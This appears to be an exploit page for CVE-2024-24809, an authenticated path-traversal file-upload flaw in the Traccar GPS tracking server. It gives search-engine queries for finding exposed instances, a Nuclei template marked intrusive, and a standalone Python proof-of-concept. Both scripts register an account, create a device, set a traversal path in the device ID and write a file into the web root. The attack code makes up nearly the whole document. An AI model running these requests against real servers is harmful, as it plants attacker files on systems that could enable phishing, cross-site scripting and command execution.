CVE-2024-24809

fofa: app="Traccar"Quake：title:"Traccar"

id: CVE-2024-24809info:  name: Traccar - An authentication bypass vulnerability  author: Ghost_sec  severity: high  description:    Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.  reference:    - https://github.com/traccar/traccar/commit/b099b298f90074c825ba68ce73532933c7b9d901    - https://notcve.org/view.php?id=CVE-2024-24809    - https://nvd.nist.gov/vuln/detail/CVE-2024-24809  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L    cvss-score: 8.5    cve-id: CVE-2024-24809    cwe-id: CWE-27    epss-score: 0.00043    epss-percentile: 0.09551  metadata:    verified: true    max-request: 1    shodan-query: app:"Traccar"  tags: cve,cve2024,traccar,rce,intrusive,file-uploadvariables:  name: "ghostsec"  password: "ghostsec"  email: "[email protected]"  unique: "{{rand_base(6)}}"  str: "{{randstr}}"flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7)http:  - raw:      - |        POST /api/users HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}    matchers:      - type: word        part: body        words:          - '"administrator":'          - '"fixedEmail"'        condition: and        internal: true  - raw:      - |        POST /api/session HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded;charset=UTF-8        email={{email}}&password={{password}}    matchers:      - type: word        part: body        words:          - '"deviceReadonly":'          - '"expirationTime":'        condition: and        internal: true  - raw:      - |        POST /api/devices HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"name": "{{unique}}", "uniqueId": "{{unique}}"}    matchers:      - type: word        part: body        words:          - '"calendarId"'          - '"groupId":'        condition: and        internal: true    extractors:      - type: json        part: body        name: value        internal: true        json:          - '.id'  - raw:      - |        POST /api/devices/{{value}}/image HTTP/1.1        Host: {{Hostname}}        Content-Type: image/srHtgGrc        {{str}}    extractors:      - type: regex        part: body        name: filename        internal: true        regex:          - 'device.([a-zA-Z]+)'    matchers:      - type: dsl        dsl:          - status_code == 200          - contains(content_type, "application/json")        condition: and        internal: true  - raw:      - |        PUT /api/devices/{{value}} HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"id": {{value}}, "attributes": {"deviceImage": "device.png"}, "groupId": 0, "calendarId": 0, "name": "test", "uniqueId": "{{unique}}/../../../../../opt/traccar/modern", "status": "offline", "lastUpdate": null, "positionId": 0, "phone": null, "model": null, "contact": null, "category": null, "disabled": false, "expirationTime": null}    matchers:      - type: word        part: body        words:          - '"deviceImage":'          - '"expirationTime":'        condition: and        internal: true  - raw:      - |        POST /api/devices/{{value}}/image HTTP/1.1        Host: {{Hostname}}        Content-Type: image/srHtgGrc        {{str}}    matchers:      - type: dsl        dsl:          - status_code == 200          - contains(content_type, "application/json")        condition: and        internal: true  - raw:      - |        GET /{{filename}} HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - status_code == 200

import requestsimport randomimport stringimport syssession = requests.session()def generate_random_string(length=8):    letters = string.ascii_letters    result_str = ''.join(random.choice(letters) for i in range(length))    return result_strdef register(target, username):    headers = {        'Content-Type': "application/json"    }    data = {        "name": username,        "email": f"{username}@admin.com",        "password": "123456"    }    res = session.post(f"{target}/api/users",headers=headers, json=data)    return resdef login(target, username):    headers = {        'Content-Type': "application/x-www-form-urlencoded;charset=UTF-8"    }    data = 'email=' + username + '@admin.com&password=123456'    res = session.post(f"{target}/api/session",headers=headers, data=data)    return resdef add_device(target, device_name):    headers = {        'Content-Type': "application/json"    }    data = {        "name": device_name,        "uniqueId": device_name    }    res = session.post(f"{target}/api/devices",headers=headers, json=data)    return resdef upload_file(target, device_id, file_suffix, data):    headers = {        'Content-Type': f"image/{file_suffix}"    }    res = session.post(f"{target}/api/devices/{device_id}/image",headers=headers, data=data)    return resdef change_upload_path(target, device_id, device_name, upload_path):    headers = {        'Content-Type': 'application/json'    }    data = {        "id": device_id,        "attributes": {            "deviceImage": "device.png"        },        "groupId": 0,        "calendarId": 0,        "name": "test",        "uniqueId": f"{device_name}/../../../../..{upload_path}",        "status": "offline", "lastUpdate":None,"positionId":0,"phone":None,"model":None,"contact":None,"category":None,"disabled":False,"expirationTime":None}    res = session.put(f"{target}/api/devices/{device_id}",headers=headers, json=data)    return resif __name__ == "__main__":    if len(sys.argv) != 2:        print(f"Usage: python {sys.argv[0]} http://example.com:8082")        sys.exit(0)    target = sys.argv[1]    username = generate_random_string()    # register user    res = register(target, username)    if username not in res.text:        print("Register Error!!")        sys.exit(0)    print(f"Register: {username}@admin.com  Password: 123456")    # login    res = login(target, username)    if username not in res.text:        print("Login Error!!")        sys.exit(0)    print("Login Success!!")    device_name = generate_random_string()    # Add Device    res = add_device(target, device_name)    if 'id' not in res.text:        print("ADD Device Error!!")        sys.exit(0)    print(f'Add Device Success!! [{device_name}]')    device_id = res.json()['id']    # # Upload File    suffix = generate_random_string()    data = generate_random_string(20)    res = upload_file(target, device_id, suffix, data)    if 'device.' + suffix not in res.text:        print("Upload Error!!")        sys.exit(0)    print(f"First Upload Success!!")    # Change Upload Path    upload_path = "/opt/traccar/modern"    res = change_upload_path(target, device_id, device_name, upload_path)    if upload_path not in res.text:        print("Change Upload Path Error!!")        sys.exit(0)    print("Change Upload Path Success!!")    # Upload File Again    res = upload_file(target, device_id, suffix, data)    if 'device.' + suffix not in res.text:        print("Upload Error!!")        sys.exit(0)    print("Upload Success!!")    # Check upload    # if set upload_path = "/opt/traccar/modern"    check_url = f"{target}/device.{suffix}"    print(f"Check: {check_url}")    res = session.get(check_url)    if data in res.text:        print("Is a Vulnerability!")    else:        print('Not is a Vulnerability!')